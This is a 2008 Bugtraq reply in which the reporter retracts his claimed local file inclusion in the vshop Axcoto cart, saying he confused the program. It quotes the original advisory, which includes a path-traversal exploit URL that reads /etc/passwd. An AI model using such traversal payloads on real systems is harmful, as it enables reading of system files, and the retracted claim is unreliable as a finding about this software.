[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: vshop - Axcoto cart <= 0.1alpha / Local File Inclusion Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx, bugtraq-owner@xxxxxxxxxxxxxxxxx
- Subject: Re: vshop - Axcoto cart <= 0.1alpha / Local File Inclusion Vulnerability
- From: "Jose Luis" <pepeluxx@xxxxxxxxx>
- Date: Thu, 23 Oct 2008 11:33:24 +0200
I'm sorry ... this is not vulnerable. I confused the program
2008/10/22 Pepelux <pepelux@xxxxxxxxxxxx>:
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> vshop - Axcoto cart <= 0.1alpha / Local File Inclusion Vulnerability
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
> $ Program: vshop - Axcoto cart
> $ Version: <= 0.1alpha
> $ File affected: ADMIN/header.php
> $ Download: http://sourceforge.net/projects/vshop/
>
>
> Found by Pepelux <pepelux[at]enye-sec.org>
> eNYe-Sec - www.enye-sec.org
>
>
> --Bug --
>
> 4. if (!$language)$language="ch";
> 5. include_once("../lib/lang.".$language.".php");
>
>
>
> -- Exploit --
>
> http://site.com/ADMIN/header.php?language=/../../../../../etc/passwd%00
>